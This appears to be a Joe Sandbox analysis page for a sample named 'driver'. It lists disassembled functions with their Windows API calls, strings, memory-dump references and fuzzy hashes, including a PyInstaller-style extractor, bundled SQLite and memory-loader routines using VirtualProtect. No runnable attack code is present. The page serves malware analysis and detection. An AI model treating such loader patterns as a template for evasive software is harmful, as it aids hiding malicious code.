Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: %s at line %d of [%.10s]$8653b758870e6ef0c98d46b3ace27849054af85da891eb121e9aaa537f1e8355$API call with %s database connection pointer$NULL$invalid$misuse$unopened
API String ID: 22509725-509082904
Opcode ID: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
Instruction ID: b27c274e451537ff74eabed874c56ee897504c8c7a6e684194ef88c87479ac22
Opcode Fuzzy Hash: e3ced5d6ea85a757b1e139773ef655a56cd29a8a81a97bbefb3f42df5bc13da9
Instruction Fuzzy Hash: E212CFA1A0FA42A5FB549F2598583796BA1FF80BC8F046031DF4E07794DF3CE4618328

Function 00007FF6A29D5C70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6A29D5CB5

Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C

Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

Part of subcall function 00007FF6A29CA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA979
Part of subcall function 00007FF6A29CA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6A29CA94F,?,?,?,?,?,00007FF6A29CA83A), ref: 00007FF6A29CA99E

_get_daylight.LIBCMT ref: 00007FF6A29D5CA4

Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C

_get_daylight.LIBCMT ref: 00007FF6A29D5F1A
_get_daylight.LIBCMT ref: 00007FF6A29D5F2B
_get_daylight.LIBCMT ref: 00007FF6A29D5F3C
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63

Strings

Eastern Summer Time, xrefs: 00007FF6A29D6021
Eastern Standard Time, xrefs: 00007FF6A29D6009

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 4070488512-239921721
Opcode ID: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction ID: c1092af912ab9c195aa3b9abc9fd48a7821443738fc25ae78f96f1c787582ad8
Opcode Fuzzy Hash: 0c9ae4c43809035ead388df1149d8e15e4647e923e6de7bb59d770bfc2eeda5e
Instruction Fuzzy Hash: 5BD1C126A4A24246FB24AF37D4811B96791EF84F9CF808136EA4DC7697DFBCE441B740

Function 00007FF6A29D69D4 Relevance: 13.8, APIs: 9, Instructions: 276
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D6749
Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D67C7
Part of subcall function 00007FF6A29D6708: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D6818

CreateFileW.KERNEL32 ref: 00007FF6A29D6ADA
CreateFileW.KERNEL32 ref: 00007FF6A29D6B2A
GetLastError.KERNEL32 ref: 00007FF6A29D6B5A
GetFileType.KERNEL32 ref: 00007FF6A29D6B6F
GetLastError.KERNEL32 ref: 00007FF6A29D6B79
CloseHandle.KERNEL32 ref: 00007FF6A29D6BAC
CloseHandle.KERNEL32 ref: 00007FF6A29D6D0F
CreateFileW.KERNEL32 ref: 00007FF6A29D6D44
GetLastError.KERNEL32 ref: 00007FF6A29D6D53

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
String ID:
API String ID: 1617910340-0
Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction ID: fb2cdb28f41e68f012ac534de495ffc7873891c7934d432ecb014d89e333865d
Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
Instruction Fuzzy Hash: 9AC1D032B69A4185EB10CFA6D4902AC37A1FB49F9CB015239DE2E977D6CF78E451E300

Function 00007FF6A29D5EEC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_get_daylight.LIBCMT ref: 00007FF6A29D5F1A

Part of subcall function 00007FF6A29D5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D567C

_get_daylight.LIBCMT ref: 00007FF6A29D5F2B

Part of subcall function 00007FF6A29D5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D561C

_get_daylight.LIBCMT ref: 00007FF6A29D5F3C

Part of subcall function 00007FF6A29D5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6A29D564C

Part of subcall function 00007FF6A29CA9B8: HeapFree.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9CE
Part of subcall function 00007FF6A29CA9B8: GetLastError.KERNEL32(?,?,?,00007FF6A29D2D92,?,?,?,00007FF6A29D2DCF,?,?,00000000,00007FF6A29D3295,?,?,?,00007FF6A29D31C7), ref: 00007FF6A29CA9D8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6A29D617C), ref: 00007FF6A29D5F63

Strings

Eastern Summer Time, xrefs: 00007FF6A29D6021
Eastern Standard Time, xrefs: 00007FF6A29D6009

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: Eastern Standard Time$Eastern Summer Time
API String ID: 3458911817-239921721
Opcode ID: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction ID: b4a91b8df81e8fe54c1de5d1cb109bd6afdbb190dae51a66343283e5ab6a6e99
Opcode Fuzzy Hash: 4f5f64917f1a6fb99e16ec8d4eadf885fc2e5ee96e92320975b551feff7f9d51
Instruction Fuzzy Hash: CE516532A4A68286E754DF27E4815A96790FF48F8CF844135EA4DC7697DFBCE440A740

Function 00007FF8A8619060 Relevance: 9.6, APIs: 4, Strings: 1, Instructions: 850librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A8619B20
GetProcAddress.KERNEL32 ref: 00007FF8A8619B4A
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A8619BD4
VirtualProtect.KERNEL32 ref: 00007FF8A8619BF2

Strings

)tP, xrefs: 00007FF8A861908B

Memory Dump Source

Source File: 00000002.00000002.2449432536.00007FF8A8619000.00000080.00000001.01000000.00000011.sdmp, Offset: 00007FF8A8110000, based on PE: true

Associated: 00000002.00000002.2448106725.00007FF8A8110000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8111000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8122000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8132000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8138000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8182000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8197000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A81A7000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A81AE000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A81BC000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A839E000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8489000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A848B000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A84C2000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A84FF000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A855A000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A85CB000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8600000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2448164791.00007FF8A8613000.00000040.00000001.01000000.00000011.sdmpDownload File
Associated: 00000002.00000002.2449471266.00007FF8A861A000.00000004.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8110000_driver.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID: )tP
API String ID: 3300690313-3907340667
Opcode ID: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction ID: 6721fd69a48f24947ee2015cb7efd0ceff5616b248f75f47e4cb2c09e7d9f552
Opcode Fuzzy Hash: eab163715ab1799b633ac6e81f81b77985ed928b0291ff377fca493afee617fe
Instruction Fuzzy Hash: 8162342262919296F719CF38D4082BD76A0F7487C5F486532EA9EC37C5EB3CEA45CB14

Function 00007FF8A86D4CF0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 370COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86D4F7D
00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86D502E

Strings

out of memory, xrefs: 00007FF8A86D4DDF
statement too long, xrefs: 00007FF8A86D4F33
database schema is locked: %s, xrefs: 00007FF8A86D4ED6

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: database schema is locked: %s$out of memory$statement too long
API String ID: 22509725-1046679716
Opcode ID: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction ID: 8703a2527f961a333fd87da27e7aedc59724ac7ffa3aa12efb291ff25549464f
Opcode Fuzzy Hash: e2f7c39f318c7ea93f7d1a202841d5281a61491d29e83d696b40f3bf40332c63
Instruction Fuzzy Hash: 02F1862290EB81A6FB24DF25D4087BA67A0FB857C8F086135DA4D07B95DF7CE885CB14

Function 00007FF8A8030330 Relevance: 6.9, APIs: 4, Instructions: 885librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF8A8030E45
GetProcAddress.KERNEL32 ref: 00007FF8A8030E63
VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00007FF8A8030EE3
VirtualProtect.KERNEL32 ref: 00007FF8A8030F01

Memory Dump Source

Source File: 00000002.00000002.2447146577.00007FF8A8030000.00000080.00000001.01000000.00000014.sdmp, Offset: 00007FF8A7F80000, based on PE: true

Associated: 00000002.00000002.2446587978.00007FF8A7F80000.00000002.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7F81000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FCA000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A7FD8000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A8027000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802C000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2446639595.00007FF8A802F000.00000040.00000001.01000000.00000014.sdmpDownload File
Associated: 00000002.00000002.2447206184.00007FF8A8032000.00000004.00000001.01000000.00000014.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a7f80000_driver.jbxd

Similarity

API ID: ProtectVirtual$AddressLibraryLoadProc
String ID:
API String ID: 3300690313-0
Opcode ID: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
Instruction ID: b21b307af4285b0f30c10336fde61704503777804dd34347db08b8ad2cd0ebc9
Opcode Fuzzy Hash: 2fdf8de08e805a05838799f61d19e591a6c15f1cbdef0f3ff96d6f7f1853d3fb
Instruction Fuzzy Hash: F6622422A2A59297EB198E3AD40027D77D0FB487C5F045532EA9EC37C4EB3CEA55C714

Function 00007FF8A86722E0 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 586COMMON

Download Yara Rule

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A8672498

Strings

:memory:, xrefs: 00007FF8A8672346

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: :memory:
API String ID: 22509725-2920599690
Opcode ID: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
Instruction ID: 6b6e1172fe997fcfc7e7ab05b8c09822b803750580aac2adae50f0e4fbc467a1
Opcode Fuzzy Hash: 3d2ec196a22088dfc73d8977262f4631dc352476567c5fa5db6760948f71a506
Instruction Fuzzy Hash: 4942A1A2A0E782A6FB658B25955837927A1FF45BC4F046135CE4F03B94DF3CE494C3A8

Function 00007FF6A29B92F0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

FindFirstFileExW.KERNEL32 ref: 00007FF6A29B9323
FindClose.KERNEL32 ref: 00007FF6A29B9332

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction ID: 56e463ebe583f942e15888af9eb7f4b722ca1549162f02616e21b2b73093e953
Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
Instruction Fuzzy Hash: 2BF0C832A5E74187F7608B61B45976A7390BB88B2CF044335D9AD466D6DFBCD048AA00

Function 00007FF8A8661240 Relevance: 1.7, APIs: 1, Instructions: 204COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32 ref: 00007FF8A8661265

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction ID: 89b1cdebdfdeca279819c5a07f656d8a047d925bb3350075531d7849c0d5eb79
Opcode Fuzzy Hash: 38d67dc00fffeaf3f8496fb5d484a289404a421f995da4868477f89c343bb9ff
Instruction Fuzzy Hash: 15A11A20E4BB87AAFE5D8B85A85C27422A6FF54BC0F545535C98F577A0DF3CE4908328

Function 00007FF6A29B1950 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 184
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF6A29B7F80: _fread_nolock.LIBCMT ref: 00007FF6A29B802A

_fread_nolock.LIBCMT ref: 00007FF6A29B1A1B

Part of subcall function 00007FF6A29B2910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF6A29B1B6A), ref: 00007FF6A29B295E

Strings

fread, xrefs: 00007FF6A29B1A32, 00007FF6A29B1B5C
MEI, xrefs: 00007FF6A29B1991
Error on file., xrefs: 00007FF6A29B1B8D
Could not allocate buffer for TOC!, xrefs: 00007FF6A29B1B1B
Could not read full TOC!, xrefs: 00007FF6A29B1B55
Failed to seek to cookie position!, xrefs: 00007FF6A29B19EE
Could not allocate memory for archive structure!, xrefs: 00007FF6A29B1A61
malloc, xrefs: 00007FF6A29B1B22
calloc, xrefs: 00007FF6A29B1A68
Failed to read cookie!, xrefs: 00007FF6A29B1A2B
fseek, xrefs: 00007FF6A29B19F5

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: _fread_nolock$CurrentProcess
String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
API String ID: 2397952137-3497178890
Opcode ID: 11092ae5d3052ba6452cd45c37cd662638f4e64129f80c3c6bb932d78e9f91b0
Instruction ID: cb6eb3efc9c809685b3159172aaa5a70fe23eb464f4288205dfcd277276fc10c
Opcode Fuzzy Hash: 11092ae5d3052ba6452cd45c37cd662638f4e64129f80c3c6bb932d78e9f91b0
Instruction Fuzzy Hash: 0681C171A4E6868AEB60DB26D0512B923A1EF48F8CF404435E98DC778BDFBCE545B740

Function 00007FF6A29B1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fread, xrefs: 00007FF6A29B15E6
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF6A29B1518
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6A29B14DE
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6A29B15DF
malloc, xrefs: 00007FF6A29B151F
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6A29B149F
fseek, xrefs: 00007FF6A29B14E5

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446525455.00007FF6A29F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff6a29b0000_driver.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 375044d6be796fe755ab7c0157675cd7a81719d0168cdb53a9f361783af8d1d2
Instruction ID: c47f30c867e7c2ae03e0c6b327bd2d2e15bbf5d481107ccdd0e149c83a63f551
Opcode Fuzzy Hash: 375044d6be796fe755ab7c0157675cd7a81719d0168cdb53a9f361783af8d1d2
Instruction Fuzzy Hash: 09417E22B8A6429AFA10DB23D4515B97391EF44F9CF444432ED4D87B97DFBCE542A700

Function 00007FF8A86D4450 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

00007FF8B9F73010.VCRUNTIME140 ref: 00007FF8A86D45D9

Strings

table, xrefs: 00007FF8A86D447A
sqlite_temp_master, xrefs: 00007FF8A86D4495
SELECT*FROM"%w".%s ORDER BY rowid, xrefs: 00007FF8A86D47CF
ase, xrefs: 00007FF8A86D46DD
CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text), xrefs: 00007FF8A86D44F4
sqlite_master, xrefs: 00007FF8A86D449C

Memory Dump Source

Source File: 00000002.00000002.2449579391.00007FF8A8651000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FF8A8650000, based on PE: true

Associated: 00000002.00000002.2449522999.00007FF8A8650000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B1000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87B3000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449579391.00007FF8A87C8000.00000040.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449863697.00007FF8A87CA000.00000080.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000002.00000002.2449905434.00007FF8A87CC000.00000004.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8a8650000_driver.jbxd

Similarity

API ID: 00007F73010
String ID: CREATE TABLE x(type text,name text,tbl_name text,rootpage int,sql text)$SELECT*FROM"%w".%s ORDER BY rowid$ase$sqlite_master$sqlite_temp_master$table
API String ID: 22509725-879093740
Opcode ID: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction ID: 7dfa659a820e6461c06157e2a3f9248ffcdd7427764bd6771a4c4a6e3685c484
Opcode Fuzzy Hash: ec71655f3f29dc40e665575d76a61d121575bf91764c7af26e3c3dfdaa284bcc
Instruction Fuzzy Hash: ADE1DF22E0EB92A6FB14CB2585482BC27A1FB45BC8F055235CE0D1B791DF3CE852C764

Function 00007FF6A29B1210 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 158
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

1.3.1, xrefs: 00007FF6A29B1249
Failed to extract %s: failed to allocate temporary input buffer!, xrefs: 00007FF6A29B12BA
Failed to extract %s: inflateInit() failed with return code %d!, xrefs: 00007FF6A29B1276
Failed to extract %s: failed to allocate temporary output buffer!, xrefs: 00007FF6A29B12EF
malloc, xrefs: 00007FF6A29B12C1, 00007FF6A29B12F6
Failed to extract %s: decompression resulted in return code %d!, xrefs: 00007FF6A29B141E

Memory Dump Source

Source File: 00000002.00000002.2446283210.00007FF6A29B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6A29B0000, based on PE: true

Associated: 00000002.00000002.2446223495.00007FF6A29B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446352920.00007FF6A29DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2446420514.00007FF6A29F1000.00000004.00000001.01000000.00000003.sdmpDownload File
